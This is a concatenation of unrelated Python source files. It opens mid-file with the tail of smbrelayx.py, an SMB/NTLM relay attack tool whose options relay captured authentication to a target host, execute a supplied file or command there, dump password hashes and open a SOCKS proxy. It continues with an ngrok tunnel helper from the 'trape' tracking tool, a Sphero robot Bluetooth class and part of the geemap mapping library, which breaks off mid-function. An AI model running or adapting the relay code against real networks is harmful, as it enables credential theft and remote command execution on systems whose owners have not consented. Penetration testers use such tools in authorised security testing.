logging.info("Sending status code %s after authentication to %s" % (
ERROR_MESSAGES[self.returnStatus][0], connData['ClientIP']))
connData['Uid'] = 10
respParameters['Action'] = 0
respData['NativeOS'] = smbServer.getServerOS()
respData['NativeLanMan'] = smbServer.getServerOS()
respSMBCommand['Parameters'] = respParameters
respSMBCommand['Data'] = respData
# From now on, the client can ask for other commands
connData['Authenticated'] = True
#############################################################
# SMBRelay
smbServer.setConnectionData('SMBRelay', smbData)
#############################################################
smbServer.setConnectionData(connId, connData)
return [respSMBCommand], None, errorCode
def _start(self):
self.server.serve_forever()
def run(self):
logging.info("Setting up SMB Server")
self._start()
def setTargets(self, targets):
self.target = targets
def setExeFile(self, filename):
self.exeFile = filename
def setCommand(self, command):
self.command = command
def setSocks(self, socks):
self.runSocks = socks
def setReturnStatus(self, returnStatus):
# Specifies return status after successful relayed authentication to return
# to the connecting client. This comes useful when we don't want the connecting
# client to store successful credentials in his memory. Valid statuses:
# STATUS_SUCCESS - denotes that the connecting client passed valid credentials,
# which will make him store them accordingly.
# STATUS_ACCESS_DENIED - may occur for instance when the client is not a Domain Admin,
# and got configured Remote UAC, thus preventing connection to ADMIN$
# STATUS_LOGON_FAILURE - which will tell the connecting client that the passed credentials
# are invalid.
self.returnStatus = {
'success' : STATUS_SUCCESS,
'denied' : STATUS_ACCESS_DENIED,
'logon_failure' : STATUS_LOGON_FAILURE
}[returnStatus.lower()]
def setMode(self,mode, one_shot):
self.mode = mode
self.one_shot = one_shot
def setDomainAccount( self, machineAccount, machineHashes, domainIp):
self.machineAccount = machineAccount
self.machineHashes = machineHashes
self.domainIp = domainIp
# Process command-line arguments.
if __name__ == '__main__':
RELAY_SERVERS = ( SMBRelayServer, HTTPRelayServer )
print(version.BANNER)
parser = argparse.ArgumentParser(add_help=False,
description="For every connection received, this module will try to SMB relay that "
" connection to the target system or the original client")
parser.add_argument("--help", action="help", help='show this help message and exit')
parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
parser.add_argument('-h', action='store', metavar='HOST',
help='Host to relay the credentials to, if not it will relay it back to the client')
parser.add_argument('-s', action='store', choices={'success', 'denied', 'logon_failure'}, default='success',
help='Status to return after client performed authentication. Default: "success".')
parser.add_argument('-e', action='store', required=False, metavar='FILE',
help='File to execute on the target system. If not specified, hashes will be dumped '
'(secretsdump.py must be in the same directory)')
parser.add_argument('-c', action='store', type=str, required=False, metavar='COMMAND',
help='Command to execute on target system. If not specified, hashes will be dumped '
'(secretsdump.py must be in the same directory)')
parser.add_argument('-socks', action='store_true', default=False,
help='Launch a SOCKS proxy for the connection relayed')
parser.add_argument('-one-shot', action='store_true', default=False,
help='After successful authentication, only execute the attack once for each target')
parser.add_argument('-codec', action='store', help='Sets encoding used (codec) from the target\'s output (default '
'"%s"). If errors are detected, run chcp.com at the target, '
'map the result with '
'https://docs.python.org/3/library/codecs.html#standard-encodings and then execute smbrelayx.py '
'again with -codec and the corresponding codec ' % CODEC)
parser.add_argument('-outputfile', action='store',
help='base output filename for encrypted hashes. Suffixes will be added for ntlm and ntlmv2')
parser.add_argument('-machine-account', action='store', required=False,
help='Domain machine account to use when interacting with the domain to grab a session key for '
'signing, format is domain/machine_name')
parser.add_argument('-machine-hashes', action="store", metavar="LMHASH:NTHASH",
help='Domain machine hashes, format is LMHASH:NTHASH')
parser.add_argument('-domain', action="store", help='Domain FQDN or IP to connect using NETLOGON')
try:
options = parser.parse_args()
except Exception as e:
logging.error(str(e))
sys.exit(1)
# Init the example's logger theme
logger.init(options.ts)
if options.codec is not None:
CODEC = options.codec
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
# Print the Library's installation path
logging.debug(version.getInstallationPath())
else:
logging.getLogger().setLevel(logging.INFO)
logging.getLogger('impacket.smbserver').setLevel(logging.ERROR)
if options.h is not None:
logging.info("Running in relay mode")
mode = 'RELAY'
targetSystem = options.h
else:
logging.info("Running in reflection mode")
targetSystem = None
mode = 'REFLECTION'
exeFile = options.e
Command = options.c
returnStatus = options.s
threads = set()
if options.socks is True:
# Start a SOCKS proxy in the background
s1 = SOCKS()
socks_thread = Thread(target=s1.serve_forever)
socks_thread.daemon = True
socks_thread.start()
threads.add(socks_thread)
for server in RELAY_SERVERS:
s = server(options.outputfile)
s.setTargets(targetSystem)
s.setExeFile(exeFile)
s.setCommand(Command)
s.setSocks(options.socks)
s.setReturnStatus(returnStatus)
s.setMode(mode, options.one_shot)
if options.machine_account is not None and options.machine_hashes is not None and options.domain is not None:
s.setDomainAccount( options.machine_account, options.machine_hashes, options.domain)
elif (options.machine_account is None and options.machine_hashes is None and options.domain is None) is False:
logging.error("You must specify machine-account/hashes/domain all together!")
sys.exit(1)
s.start()
threads.add(s)
print("")
logging.info("Servers started, waiting for connections")
while True:
try:
sys.stdin.read()
except KeyboardInterrupt:
logging.info('Quitting.. please wait')
if options.socks is True:
s1.shutdown()
for s in threads:
del(s)
sys.exit(1)
else:
pass
|
ngrok.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#**
#
#########
# trape #
#########
#
# trape depends of this file
# For full copyright information this visit: https://github.com/jofpin/trape
#
# Copyright 2018 by Jose Pino (@jofpin) / <jofpin@gmail.com>
#**
import sys
import os, platform
import subprocess
import socket
import os.path as path
from multiprocessing import Process
class ngrok(object):
def __init__(self, authtoken, port, nT, hash):
if authtoken:
self.token = authtoken
else:
print "Can't use Ngrok without a valid token"
system_type = os.name
system_name = platform.system()
system_architecture = platform.architecture()[0]
str_ngrok = './ngrok'
if "nt" in system_type:
str_ngrok = './ngrok.exe'
if path.exists(str_ngrok):
pass
else:
import urllib2
if "posix" in system_type:
if "arwin" in system_name:
if "64" in system_architecture:
download_link = "https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-darwin-amd64.zip"
else:
download_link = "https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-darwin-386.zip"
else:
if "64" in system_architecture:
download_link = "https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip"
else:
download_link = "https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-386.zip"
elif "nt" in system_type:
if "64" in system_architecture:
download_link = "https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-windows-amd64.zip"
else:
download_link = "https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-windows-386.zip"
else:
sys.exit(0)
filename = "ngrok.zip"
download = urllib2.urlopen(download_link)
saved_file=file(filename,"w")
saved_file.write(download.read())
saved_file.close()
result = subprocess.check_output(["unzip", filename])
os.remove(filename)
subprocess.check_output([str_ngrok, "authtoken", authtoken])
if nT > 0:
pNg = Process(target=start_ngrok, args=(str(port), hash, 1))
pNg.start()
def start_ngrok(port, hash, f=0):
if f != 0:
str_ngrok = './ngrok'
system_type = os.name
if "nt" in system_type:
str_ngrok = './ngrok.exe'
result = subprocess.check_output([str_ngrok, "http", port])
print result
|
__init__.py
|
import threading
import time
from collections import OrderedDict, defaultdict
from concurrent import futures
from functools import partial
from queue import SimpleQueue
from typing import NamedTuple, Callable
from spherov2.controls.v1 import Packet as PacketV1
from spherov2.controls.v2 import Packet as PacketV2
from spherov2.types import ToyType
class ToySensor(NamedTuple):
bit: int
min_value: float
max_value: float
modifier: Callable[[float], float] = None
class Toy:
toy_type = ToyType('Robot', None, 'Sphero', .06)
sensors = OrderedDict()
extended_sensors = OrderedDict()
_send_uuid = '22bb746f-2ba1-7554-2d6f-726568705327'
_response_uuid = '22bb746f-2ba6-7554-2d6f-726568705327'
_handshake = [('22bb746f-2bbd-7554-2d6f-726568705327', bytearray(b'011i3')),
('22bb746f-2bb2-7554-2d6f-726568705327', bytearray([7]))]
_packet = PacketV1
_require_target = False
def __init__(self, toy, adapter_cls):
self.address = toy.address
self.name = toy.name
self.__adapter = None
self.__adapter_cls = adapter_cls
self._packet_manager = self._packet.Manager()
self.__decoder = self._packet.Collector(self.__new_packet)
self.__waiting = defaultdict(SimpleQueue)
self.__listeners = defaultdict(dict)
self._sensor_controller = None
self.__thread = None
self.__packet_queue = SimpleQueue()
def __enter__(self):
if self.__adapter is not None:
raise RuntimeError('Toy already in context manager')
self.__adapter = self.__adapter_cls(self.address)
self.__thread = threading.Thread(target=self.__process_packet)
try:
for uuid, data in self._handshake:
self.__adapter.write(uuid, data)
self.__adapter.set_callback(self._response_uuid, self.__api_read)
self.__thread.start()
except:
self.__exit__(None, None, None)
raise
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.__adapter.close()
self.__adapter = None
if self.__thread.is_alive():
self.__packet_queue.put(None)
self.__thread.join()
self.__packet_queue = SimpleQueue()
def __process_packet(self):
while self.__adapter is not None:
payload = self.__packet_queue.get()
if payload is None:
break
# print('request ' + ' '.join([hex(c) for c in payload]))
while payload:
self.__adapter.write(self._send_uuid, payload[:20])
payload = payload[20:]
time.sleep(self.toy_type.cmd_safe_interval)
def _execute(self, packet):
if self.__adapter is None:
raise RuntimeError('Use toys in context manager')
self.__packet_queue.put(packet.build())
return self._wait_packet(packet.id)
def _wait_packet(self, key, timeout=10.0, check_error=False):
future = futures.Future()
self.__waiting[key].put(future)
packet = future.result(timeout)
if check_error:
packet.check_error()
return packet
def _add_listener(self, key, listener: Callable):
self.__listeners[key[0]][listener] = partial(key[1], listener)
def _remove_listener(self, key, listener: Callable):
self.__listeners[key[0]].pop(listener)
def __api_read(self, char, data):
self.__decoder.add(data)
def __new_packet(self, packet):
# print('response ' + ' '.join([hex(c) for c in packet.build()]))
key = packet.id
queue = self.__waiting[key]
while not queue.empty():
queue.get().set_result(packet)
for f in self.__listeners[key].values():
threading.Thread(target=f, args=(packet,)).start()
@classmethod
def implements(cls, method, with_target=False):
m = getattr(cls, method.__name__, None)
if m is method:
return with_target == cls._require_target
if hasattr(m, '_partialmethod'):
f = m._partialmethod
return f.func is method and (
('proc' in f.keywords and not with_target) or with_target == cls._require_target)
return False
class ToyV2(Toy):
_packet = PacketV2
_handshake = []
_response_uuid = _send_uuid = '00010002-574f-4f20-5370-6865726f2121' #Original
#_response_uuid = '22bb746f-2ba6-7554-2d6f-726568705327'
#_send_uuid = '22bb746f-2ba1-7554-2d6f-726568705327'
#_send_uuid = '00010002-574f-4f20-5370-6865726f2121'
#_response_uuid = '00020002-574f-4f20-5370-6865726f2121'
# _response_uuid = _send_uuid = '00010001-574f-4f20-5370-6865726f2121' #Available responses
# _response_uuid = _send_uuid = '00010002-574f-4f20-5370-6865726f2121'
# _response_uuid = _send_uuid = '00010003-574f-4f20-5370-6865726f2121'
# _response_uuid = _send_uuid = '00020001-574f-4f20-5370-6865726f2121'
# _response_uuid = _send_uuid = '00020002-574f-4f20-5370-6865726f2121'
# _response_uuid = _send_uuid = '00020004-574f-4f20-5370-6865726f2121'
# _response_uuid = _send_uuid = '00020005-574f-4f20-5370-6865726f2121'
# _response_uuid = _send_uuid = '22bb746f-2bbd-7554-2d6f-726568705327'
# _response_uuid = _send_uuid = '22bb746f-2bb2-7554-2d6f-726568705327'
# _response_uuid = _send_uuid = '22bb746f-2bbf-7554-2d6f-726568705327'
# _response_uuid = _send_uuid = '22bb746f-2ba0-7554-2d6f-726568705327'
# _response_uuid = _send_uuid = '22bb746f-2ba1-7554-2d6f-726568705327'
# _response_uuid = _send_uuid = '22bb746f-2ba6-7554-2d6f-726568705327'
# _response_uuid = _send_uuid = '22bb746f-2bb0-7554-2d6f-726568705327'
#Some values found in apk - should revisit what values may be per robot
#Adaptor.BLEService = "22bb746f2bb075542d6f726568705327";
#Adaptor.WakeCharacteristic = "22bb746f2bbf75542d6f726568705327";
#Adaptor.TXPowerCharacteristic = "22bb746f2bb275542d6f726568705327";
#Adaptor.AntiDosCharacteristic = "22bb746f2bbd75542d6f726568705327";
#Adaptor.RobotControlService = "22bb746f2ba075542d6f726568705327";
#Adaptor.CommandsCharacteristic = "22bb746f2ba175542d6f726568705327";
#Adaptor.ResponseCharacteristic = "22bb746f2ba675542d6f726568705327";
|
geemap.py
|
"""Main module for interactive mapping using Google Earth Engine Python API and ipyleaflet.
Keep in mind that Earth Engine functions use both camel case and snake case, such as setOptions(), setCenter(), centerObject(), addLayer().
ipyleaflet functions use snake case, such as add_tile_layer(), add_wms_layer(), add_minimap().
"""
import math
import os
import time
import ee
import ipyevents
import ipyleaflet
import ipywidgets as widgets
from bqplot import pyplot as plt
from ipyfilechooser import FileChooser
from IPython.display import display
from .basemaps import basemap_tiles, basemaps
from .common import *
from .conversion import *
from .legends import builtin_legends
class Map(ipyleaflet.Map):
"""The Map class inherits from ipyleaflet.Map. The arguments you can pass to the Map can be found at https://ipyleaflet.readthedocs.io/en/latest/api_reference/map.html. By default, the Map will add Google Maps as the basemap. Set add_google_map = False to use OpenStreetMap as the basemap.
Returns:
object: ipyleaflet map object.
"""
def __init__(self, **kwargs):
# Authenticates Earth Engine and initializes an Earth Engine session
if "ee_initialize" not in kwargs.keys():
kwargs["ee_initialize"] = True
if kwargs["ee_initialize"]:
ee_initialize()
# Default map center location (lat, lon) and zoom level
latlon = [40, -100]
zoom = 4
# Interchangeable parameters between ipyleaflet and folium
if "height" not in kwargs.keys():
kwargs["height"] = "600px"
if "location" in kwargs.keys():
kwargs["center"] = kwargs["location"]
kwargs.pop("location")
if "center" not in kwargs.keys():
kwargs["center"] = latlon
if "zoom_start" in kwargs.keys():
kwargs["zoom"] = kwargs["zoom_start"]
kwargs.pop("zoom_start")
if "zoom" not in kwargs.keys():
kwargs["zoom"] = zoom
if "add_google_map" not in kwargs.keys() and "basemap" not in kwargs.keys():
kwargs["add_google_map"] = True
if "scroll_wheel_zoom" not in kwargs.keys():
kwargs["scroll_wheel_zoom"] = True
if "lite_mode" not in kwargs.keys():
kwargs["lite_mode"] = False
if kwargs["lite_mode"]:
kwargs["data_ctrl"] = False
kwargs["zoom_ctrl"] = True
kwargs["fullscreen_ctrl"] = False
kwargs["draw_ctrl"] = False
kwargs["search_ctrl"] = False
kwargs["measure_ctrl"] = False
kwargs["scale_ctrl"] = False
kwargs["layer_ctrl"] = False
kwargs["toolbar_ctrl"] = False
kwargs["attribution_ctrl"] = False
if "data_ctrl" not in kwargs.keys():
kwargs["data_ctrl"] = True
if "zoom_ctrl" not in kwargs.keys():
kwargs["zoom_ctrl"] = True
if "fullscreen_ctrl" not in kwargs.keys():
kwargs["fullscreen_ctrl"] = True
if "draw_ctrl" not in kwargs.keys():
kwargs["draw_ctrl"] = True
if "search_ctrl" not in kwargs.keys():
kwargs["search_ctrl"] = False
if "measure_ctrl" not in kwargs.keys():
kwargs["measure_ctrl"] = True
if "scale_ctrl" not in kwargs.keys():
kwargs["scale_ctrl"] = True
if "layer_ctrl" not in kwargs.keys():
kwargs["layer_ctrl"] = False
if "toolbar_ctrl" not in kwargs.keys():
kwargs["toolbar_ctrl"] = True
if "attribution_ctrl" not in kwargs.keys():
kwargs["attribution_ctrl"] = True
if "use_voila" not in kwargs.keys():
kwargs["use_voila"] = False
if (
"basemap" in kwargs.keys()
and isinstance(kwargs["basemap"], str)
and kwargs["basemap"] in basemaps.keys()
):
kwargs["basemap"] = basemap_tiles[kwargs["basemap"]]
if os.environ.get("USE_VOILA") is not None:
kwargs["use_voila"] = True
# Inherits the ipyleaflet Map class
super().__init__(**kwargs)
self.baseclass = "ipyleaflet"
self.layout.height = kwargs["height"]
self.clear_controls()
# The number of shapes drawn by the user using the DrawControl
self.draw_count = 0
# The list of Earth Engine Geometry objects converted from geojson
self.draw_features = []
# The Earth Engine Geometry object converted from the last drawn feature
self.draw_last_feature = None
self.draw_layer = None
self.draw_last_json = None
self.draw_last_bounds = None
self.user_roi = None
self.user_rois = None
self.last_ee_data = None
self.last_ee_layer = None
self.roi_start = False
self.roi_end = False
if kwargs["ee_initialize"]:
self.roi_reducer = ee.Reducer.mean()
self.roi_reducer_scale = None
# List for storing pixel values and locations based on user-drawn geometries.
self.chart_points = []
self.chart_values = []
self.chart_labels = None
self.plot_widget = None # The plot widget for plotting Earth Engine data
self.plot_control = None # The plot control for interacting plotting
self.random_marker = None
self.legend_widget = None
self.legend_control = None
self.colorbar = None
self.ee_layers = []
self.ee_layer_names = []
self.ee_raster_layers = []
self.ee_raster_layer_names = []
self.ee_vector_layers = []
self.ee_vector_layer_names = []
self.ee_layer_dict = {}
self.search_locations = None
self.search_loc_marker = None
self.search_loc_geom = None
self.search_datasets = None
self.screenshot = None
self.toolbar = None
self.toolbar_button = None
self.vis_control = None
self.vis_widget = None
self.colorbar_ctrl = None
self.colorbar_widget = None
self.tool_output = None
self.tool_output_ctrl = None
self.layer_control = None
self.convert_ctrl = None
# Adds search button and search box
search_button = widgets.ToggleButton(
value=False,
tooltip="Search location/data",
icon="globe",
layout=widgets.Layout(
width="28px", height="28px", padding="0px 0px 0px 4px"
),
)
search_type = widgets.ToggleButtons(
options=["name/address", "lat-lon", "data"],
tooltips=[
"Search by place name or address",
"Search by lat-lon coordinates",
"Search Earth Engine data catalog",
],
)
search_type.style.button_width = "110px"
search_box = widgets.Text(
placeholder="Search by place name or address",
tooltip="Search location",
layout=widgets.Layout(width="340px"),
)
search_output = widgets.Output(
layout={
"max_width": "340px",
"max_height": "250px",
"overflow": "scroll",
}
)
search_results = widgets.RadioButtons()
assets_dropdown = widgets.Dropdown(
options=[],
layout=widgets.Layout(min_width="279px", max_width="279px"),
)
import_btn = widgets.Button(
description="import",
button_style="primary",
tooltip="Click to import the selected asset",
layout=widgets.Layout(min_width="57px", max_width="57px"),
)
def import_btn_clicked(b):
if assets_dropdown.value is not None:
datasets = self.search_datasets
dataset = datasets[assets_dropdown.index]
dataset_uid = "dataset_" + random_string(string_length=3)
line1 = "{} = {}\n".format(dataset_uid, dataset["ee_id_snippet"])
line2 = "Map.addLayer(" + dataset_uid + ', {}, "' + dataset["id"] + '")'
contents = "".join([line1, line2])
create_code_cell(contents)
import_btn.on_click(import_btn_clicked)
html_widget = widgets.HTML()
def dropdown_change(change):
dropdown_index = assets_dropdown.index
if dropdown_index is not None and dropdown_index >= 0:
with search_output:
search_output.clear_output(wait=True)
print("Loading ...")
datasets = self.search_datasets
dataset = datasets[dropdown_index]
dataset_html = ee_data_html(dataset)
html_widget.value = dataset_html
search_output.clear_output(wait=True)
display(html_widget)
assets_dropdown.observe(dropdown_change, names="value")
assets_combo = widgets.HBox()
assets_combo.children = [import_btn, assets_dropdown]
def search_result_change(change):
result_index = search_results.index
locations = self.search_locations
location = locations[result_index]
latlon = (location.lat, location.lng)
self.search_loc_geom = ee.Geometry.Point(location.lng, location.lat)
marker = self.search_loc_marker
marker.location = latlon
self.center = latlon
search_results.observe(search_result_change, names="value")
def search_btn_click(change):
if change["new"]:
search_widget.children = [search_button, search_result_widget]
search_type.value = "name/address"
else:
search_widget.children = [search_button]
search_result_widget.children = [search_type, search_box]
search_button.observe(search_btn_click, "value")
def search_type_changed(change):
search_box.value = ""
search_output.clear_output()
if change["new"] == "name/address":
search_box.placeholder = "Search by place name or address, e.g., Paris"
assets_dropdown.options = []
search_result_widget.children = [
search_type,
search_box,
search_output,
]
elif change["new"] == "lat-lon":
search_box.placeholder = "Search by lat-lon, e.g., 40, -100"
assets_dropdown.options = []
search_result_widget.children = [
search_type,
search_box,
search_output,
]
elif change["new"] == "data":
search_box.placeholder = (
"Search GEE data catalog by keywords, e.g., elevation"
)
search_result_widget.children = [
search_type,
search_box,
assets_combo,
search_output,
]
search_type.observe(search_type_changed, names="value")
def search_box_callback(text):
if text.value != "":
if search_type.value == "name/address":
g = geocode(text.value)
elif search_type.value == "lat-lon":
g = geocode(text.value, reverse=True)
if g is None and latlon_from_text(text.value):
search_output.clear_output()
latlon = latlon_from_text(text.value)
self.search_loc_geom = ee.Geometry.Point(latlon[1], latlon[0])
if self.search_loc_marker is None:
marker = ipyleaflet.Marker(
location=latlon,
draggable=False,
name="Search location",
)
self.search_loc_marker = marker
self.add_layer(marker)
self.center = latlon
else:
marker = self.search_loc_marker
marker.location = latlon
self.center = latlon
with search_output:
print(f"No address found for {latlon}")
return
elif search_type.value == "data":
search_output.clear_output()
with search_output:
print("Searching ...")
self.default_style = {"cursor": "wait"}
ee_assets = search_ee_data(text.value)
self.search_datasets = ee_assets
asset_titles = [x["title"] for x in ee_assets]
assets_dropdown.options = asset_titles
search_output.clear_output()
if len(ee_assets) > 0:
html_widget.value = ee_data_html(ee_assets[0])
with search_output:
display(html_widget)
self.default_style = {"cursor": "default"}
return
self.search_locations = g
if g is not None and len(g) > 0:
top_loc = g[0]
latlon = (top_loc.lat, top_loc.lng)
self.search_loc_geom = ee.Geometry.Point(top_loc.lng, top_loc.lat)
if self.search_loc_marker is None:
marker = ipyleaflet.Marker(
location=latlon,
draggable=False,
name="Search location",
)
self.search_loc_marker = marker
self.add_layer(marker)
self.center = latlon
else:
marker = self.search_loc_marker
marker.location = latlon
self.center = latlon
search_results.options = [x.address for x in g]
search_result_widget.children = [
search_type,
search_box,
search_output,
]
with search_output:
search_output.clear_output(wait=True)
display(search_results)
else:
with search_output:
search_output.clear_output()
print("No results could be found.")
search_box.on_submit(search_box_callback)
search_result_widget = widgets.VBox([search_type, search_box])
search_widget = widgets.HBox([search_button])
search_event = ipyevents.Event(
source=search_widget, watched_events=["mouseenter", "mouseleave"]
)
def handle_search_event(event):
if event["type"] == "mouseenter":
search_widget.children = [search_button, search_result_widget]
# search_type.value = "name/address"
elif event["type"] == "mouseleave":
if not search_button.value:
search_widget.children = [search_button]
search_result_widget.children = [search_type, search_box]
search_event.on_dom_event(handle_search_event)
data_control = ipyleaflet.WidgetControl(
widget=search_widget, position="topleft"
)
if kwargs.get("data_ctrl"):
self.add_control(control=data_control)
search_marker = ipyleaflet.Marker(
icon=ipyleaflet.AwesomeIcon(
name="check", marker_color="green", icon_color="darkgreen"
)
)
search = ipyleaflet.SearchControl(
position="topleft",
url="https://nominatim.openstreetmap.org/search?format=json&q={s}",
zoom=5,
property_name="display_name",
marker=search_marker,
)
if kwargs.get("search_ctrl"):
self.add_control(search)
if kwargs.get("zoom_ctrl"):
self.add_control(ipyleaflet.ZoomControl(position="topleft"))
if kwargs.get("layer_ctrl"):
layer_control = ipyleaflet.LayersControl(position="topright")
self.layer_control = layer_control
self.add_control(layer_control)
if kwargs.get("scale_ctrl"):
scale = ipyleaflet.ScaleControl(position="bottomleft")
self.scale_control = scale
self.add_control(scale)
if kwargs.get("fullscreen_ctrl"):
fullscreen = ipyleaflet.FullScreenControl()
self.fullscreen_control = fullscreen
self.add_control(fullscreen)
if kwargs.get("measure_ctrl"):
measure = ipyleaflet.MeasureControl(
position="bottomleft",
active_color="orange",
primary_length_unit="kilometers",
)
self.measure_control = measure
self.add_control(measure)
if kwargs.get("add_google_map"):
self.add_layer(basemap_tiles["ROADMAP"])
if kwargs.get("attribution_ctrl"):
self.add_control(ipyleaflet.AttributionControl(position="bottomright"))
draw_control = ipyleaflet.DrawControl(
marker={"shapeOptions": {"color": "#3388ff"}},
rectangle={"shapeOptions": {"color": "#3388ff"}},
circle={"shapeOptions": {"color": "#3388ff"}},
circlemarker={},
edit=True,
remove=True,
)
draw_control_lite = ipyleaflet.DrawControl(
marker={},
rectangle={"shapeOptions": {"color": "#3388ff"}},
circle={"shapeOptions": {"color": "#3388ff"}},
circlemarker={},
polyline={},
polygon={},
edit=False,
remove=False,
)
# Handles draw events
def handle_draw(target, action, geo_json):
try:
self.roi_start = True
geom = geojson_to_ee(geo_json, False)
self.user_roi = geom
feature = ee.Feature(geom)
self.draw_last_json = geo_json
self.draw_last_feature = feature
if action == "deleted" and len(self.draw_features) > 0:
self.draw_features.remove(feature)
self.draw_count -= 1
else:
self.draw_features.append(feature)
self.draw_count += 1
collection = ee.FeatureCollection(self.draw_features)
self.user_rois = collection
ee_draw_layer = ee_tile_layer(
collection, {"color": "blue"}, "Drawn Features", False, 0.5
)
draw_layer_index = self.find_layer_index("Drawn Features")
if draw_layer_index == -1:
self.add_layer(ee_draw_layer)
self.draw_layer = ee_draw_layer
else:
self.substitute_layer(self.draw_layer, ee_draw_layer)
self.draw_layer = ee_draw_layer
self.roi_end = True
self.roi_start = False
except Exception as e:
self.draw_count = 0
self.draw_features = []
self.draw_last_feature = None
self.draw_layer = None
self.user_roi = None
self.roi_start = False
self.roi_end = False
print("There was an error creating Earth Engine Feature.")
raise Exception(e)
draw_control.on_draw(handle_draw)
if kwargs.get("draw_ctrl"):
self.add_control(draw_control)
self.draw_control = draw_control
self.draw_control_lite = draw_control_lite
# Dropdown widget for plotting
self.plot_dropdown_control = None
self.plot_dropdown_widget = None
self.plot_options = {}
self.plot_marker_cluster = ipyleaflet.MarkerCluster(name="Marker Cluster")
self.plot_coordinates = []
self.plot_markers = []
self.plot_last_click = []
self.plot_all_clicks = []
self.plot_checked = False
self.inspector_checked = False
inspector_output = widgets.Output(layout={"border": "1px solid black"})
inspector_output_control = ipyleaflet.WidgetControl(
widget=inspector_output, position="topright"
)
tool_output = widgets.Output()
self.tool_output = tool_output
tool_output.clear_output(wait=True)
save_map_widget = widgets.VBox()
save_type = widgets.ToggleButtons(
options=["HTML", "PNG", "JPG"],
tooltips=[
"Save the map as an HTML file",
"Take a screenshot and save as a PNG file",
"Take a screenshot and save as a JPG file",
],
)
file_chooser = FileChooser(os.getcwd())
file_chooser.default_filename = "my_map.html"
file_chooser.use_dir_icons = True
ok_cancel = widgets.ToggleButtons(
value=None,
options=["OK", "Cancel"],
tooltips=["OK", "Cancel"],
button_style="primary",
)
def save_type_changed(change):
ok_cancel.value = None
# file_chooser.reset()
file_chooser.default_path = os.getcwd()
if change["new"] == "HTML":
file_chooser.default_filename = "my_map.html"
elif change["new"] == "PNG":
file_chooser.default_filename = "my_map.png"
elif change["new"] == "JPG":
file_chooser.default_filename = "my_map.jpg"
save_map_widget.children = [save_type, file_chooser]
def chooser_callback(chooser):
save_map_widget.children = [save_type, file_chooser, ok_cancel]
def ok_cancel_clicked(change):
if change["new"] == "OK":
file_path = file_chooser.selected
ext = os.path.splitext(file_path)[1]
if save_type.value == "HTML" and ext.upper() == ".HTML":
tool_output.clear_output()
self.to_html(file_path)
elif save_type.value == "PNG" and ext.upper() == ".PNG":
tool_output.clear_output()
self.toolbar_button.value = False
time.sleep(1)
screen_capture(outfile=file_path)
elif save_type.value == "JPG" and ext.upper() == ".JPG":
tool_output.clear_output()
self.toolbar_button.value = False
time.sleep(1)
screen_capture(outfile=file_path)
else:
label = widgets.Label(
value="The selected file extension does not match the selected exporting type."
)
save_map_widget.children = [save_type, file_chooser, label]
self.toolbar_reset()
elif change["new"] == "Cancel":
tool_output.clear_output()
self.toolbar_reset()
save_type.observe(save_type_changed, names="value")
ok_cancel.observe(ok_cancel_clicked, names="value")
file_chooser.register_callback(chooser_callback)
save_map_widget.children = [save_type, file_chooser]
tools = {
"info": {"name": "inspector", "tooltip": "Inspector"},
"bar-chart": {"name": "plotting", "tooltip": "Plotting"},
"camera": {
"name": "to_image",
"tooltip": "Save map as HTML or image",
},
"eraser": {
"name": "eraser",
"tooltip": "Remove all drawn features",
},
"folder-open": {
"name": "open_data",
"tooltip": "Open local vector/raster data",
},
# "cloud-download": {
# "name": "export_data",
# "tooltip": "Export Earth Engine data",
# },
"retweet": {
"name": "convert_js",
"tooltip": "Convert Earth Engine JavaScript to Python",
},
"gears": {
"name": "whitebox",
"tooltip": "WhiteboxTools for local geoprocessing",
},
"google": {
"name": "geetoolbox",
"tooltip": "GEE Toolbox for cloud computing",
},
"map": {
"name": "basemap",
"tooltip": "Change basemap",
},
"globe": {
"name": "timelapse",
"tooltip": "Create timelapse",
},
"fast-forward": {
"name": "timeslider",
"tooltip": "Activate timeslider",
},
"hand-o-up": {
"name": "draw",
"tooltip": "Collect training samples",
},
"line-chart": {
"name": "transect",
"tooltip": "Creating and plotting transects",
},
"random": {
"name": "sankee",
"tooltip": "Sankey plots",
},
"adjust": {
"name": "planet",
"tooltip": "Planet imagery",
},
"smile-o": {
"name": "placehold",
"tooltip": "This is a placehold",
},
"spinner": {
"name": "placehold2",
"tooltip": "This is a placehold",
},
"question": {
"name": "help",
"tooltip": "Get help",
},
}
if kwargs["use_voila"]:
voila_tools = ["camera", "folder-open", "cloud-download", "gears"]
for item in voila_tools:
if item in tools.keys():
del tools[item]
icons = list(tools.keys())
tooltips = [item["tooltip"] for item in list(tools.values())]
icon_width = "32px"
icon_height = "32px"
n_cols = 3
n_rows = math.ceil(len(icons) / n_cols)
toolbar_grid = widgets.GridBox(
children=[
widgets.ToggleButton(
layout=widgets.Layout(
width="auto", height="auto", padding="0px 0px 0px 4px"
),
button_style="primary",
icon=icons[i],
tooltip=tooltips[i],
)
for i in range(len(icons))
],
layout=widgets.Layout(
width="107px",
grid_template_columns=(icon_width + " ") * n_cols,
grid_template_rows=(icon_height + " ") * n_rows,
grid_gap="1px 1px",
padding="5px",
),
)
self.toolbar = toolbar_grid
def tool_callback(change):
if change["new"]:
current_tool = change["owner"]
for tool in toolbar_grid.children:
if tool is not current_tool:
tool.value = False
tool = change["owner"]
tool_name = tools[tool.icon]["name"]
if tool_name == "to_image":
if tool_output_control not in self.controls:
self.add_control(tool_output_control)
with tool_output:
tool_output.clear_output()
display(save_map_widget)
elif tool_name == "eraser":
self.remove_drawn_features()
tool.value = False
elif tool_name == "inspector":
self.inspector_checked = tool.value
if not self.inspector_checked:
inspector_output.clear_output()
elif tool_name == "plotting":
self.plot_checked = True
plot_dropdown_widget = widgets.Dropdown(
options=list(self.ee_raster_layer_names),
)
plot_dropdown_widget.layout.width = "18ex"
self.plot_dropdown_widget = plot_dropdown_widget
plot_dropdown_control = ipyleaflet.WidgetControl(
widget=plot_dropdown_widget, position="topright"
)
